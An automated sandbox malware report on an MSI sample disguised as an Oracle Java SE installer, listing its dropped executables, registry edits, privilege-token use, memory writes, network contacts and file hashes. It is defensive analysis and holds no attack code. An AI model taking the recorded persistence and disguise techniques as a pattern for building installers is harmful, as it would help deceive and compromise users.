Malware Analysis Report

2024-12-07 14:47

Sample ID 241007-njkn9swfqe
Target 1d2fdd9c09c8452e9c88222f2c16806a_JaffaCakes118
SHA256 7e657b695a46ef1719ec2f8baedbb9227b9de9591dcb66db7e99539fff1888d5
Tags
discovery persistence privilege_escalation defense_evasion execution exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

7e657b695a46ef1719ec2f8baedbb9227b9de9591dcb66db7e99539fff1888d5

Threat Level: Likely malicious

The file 1d2fdd9c09c8452e9c88222f2c16806a_JaffaCakes118 was found to be: Likely malicious.

Malicious Activity Summary

discovery persistence privilege_escalation defense_evasion execution exploit

Possible privilege escalation attempt

Command and Scripting Interpreter: PowerShell

Modifies file permissions

Blocklisted process makes network request

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

Enumerates connected drives

Drops file in Windows directory

Executes dropped EXE

Loads dropped DLL

Drops file in Program Files directory

Event Triggered Execution: Installer Packages

System Location Discovery: System Language Discovery

Suspicious use of WriteProcessMemory

Modifies registry class

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-07 11:25

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-07 11:25

Reported

2024-10-07 11:28

Platform

win7-20240903-en

Max time kernel

147s

Max time network

127s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\1d2fdd9c09c8452e9c88222f2c16806a_JaffaCakes118.msi

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-process-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcrypto-1_1-x64.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-conio-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-private-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140_1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-multibyte-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libcurl.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\libssl-1_1.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\msvcp140.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\f778881.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\f778882.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI94CD.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI955A.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\wix{B787FD59-D138-4CB1-8AF7-72A4E4815245}.SchedServiceConfig.rmi C:\Windows\syswow64\MsiExec.exe N/A
File created C:\Windows\Installer\f778884.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{B787FD59-D138-4CB1-8AF7-72A4E4815245}\Logo.ico C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{B787FD59-D138-4CB1-8AF7-72A4E4815245}\Logo.ico C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f778881.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9904.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\f778882.ipi C:\Windows\system32\msiexec.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe N/A
N/A N/A C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe N/A

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E C:\Windows\system32\msiexec.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\95DF787B831D1BC4A87F274A4E182554\ProductFeature C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\ProductName = "Oracle Java SE" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\PackageCode = "0EBA20D468628E64F92B33D46217DF75" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Version = "134217999" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\ProductIcon = "C:\\Windows\\Installer\\{B787FD59-D138-4CB1-8AF7-72A4E4815245}\\Logo.ico" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\PackageName = "1d2fdd9c09c8452e9c88222f2c16806a_JaffaCakes118.msi" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\95DF787B831D1BC4A87F274A4E182554 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\4283AD5241F3747428B68F1D87E32188\95DF787B831D1BC4A87F274A4E182554 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\95DF787B831D1BC4A87F274A4E182554\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\syswow64\MsiExec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2636 wrote to memory of 2840 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2636 wrote to memory of 2840 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2636 wrote to memory of 2840 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2636 wrote to memory of 2840 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2636 wrote to memory of 2840 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2636 wrote to memory of 2840 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2636 wrote to memory of 2840 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2636 wrote to memory of 1532 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2636 wrote to memory of 1532 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2636 wrote to memory of 1532 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2636 wrote to memory of 1532 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2636 wrote to memory of 1532 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2636 wrote to memory of 1532 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2636 wrote to memory of 1532 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2636 wrote to memory of 2376 N/A C:\Windows\system32\msiexec.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
PID 2636 wrote to memory of 2376 N/A C:\Windows\system32\msiexec.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
PID 2636 wrote to memory of 2376 N/A C:\Windows\system32\msiexec.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe
PID 2636 wrote to memory of 2376 N/A C:\Windows\system32\msiexec.exe C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\1d2fdd9c09c8452e9c88222f2c16806a_JaffaCakes118.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding A7D9DB54E9B6F3B6630012FC7647155E

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding D0B7C0D091818C344EFC99F4C0038533 M Global\MSI0000

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe

"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe"

C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe

"C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 repository.certum.pl udp
GB 2.22.249.67:80 repository.certum.pl tcp
N/A 127.0.0.1:49427 tcp
US 8.8.8.8:53 vivacemusic.site udp
N/A 127.0.0.1:49430 tcp
N/A 127.0.0.1:49433 tcp
N/A 127.0.0.1:49435 tcp
N/A 127.0.0.1:49438 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab84BC.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar851C.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6525274CBC2077D43D7D17A33C868C4F

MD5 d5e98140c51869fc462c8975620faa78
SHA1 07e032e020b72c3f192f0628a2593a19a70f069e
SHA256 5c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e
SHA512 9bd164cc4b9ef07386762d3775c6d9528b82d4a9dc508c3040104b8d41cfec52eb0b7e6f8dc47c5021ce2fe3ca542c4ae2b54fd02d76b0eabd9724484621a105

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6525274CBC2077D43D7D17A33C868C4F

MD5 cac3c37653b4da0e0bf825c4af1610dd
SHA1 7ed10a295822a9ca833bf0f4fe774f862bc13d02
SHA256 4706b22b2c654e9cf7ebfb7acb0905097d17797042f1c8ac650af149fe31895e
SHA512 0b4716b0bcf7484745fb69ec6b6bafedd9cbb82d645af3701f2ca17f03c1e76cabdfefa7e84a3df3161b36c77996741e3e8c2c77b169ee4dd10ee47fe2e01b5d

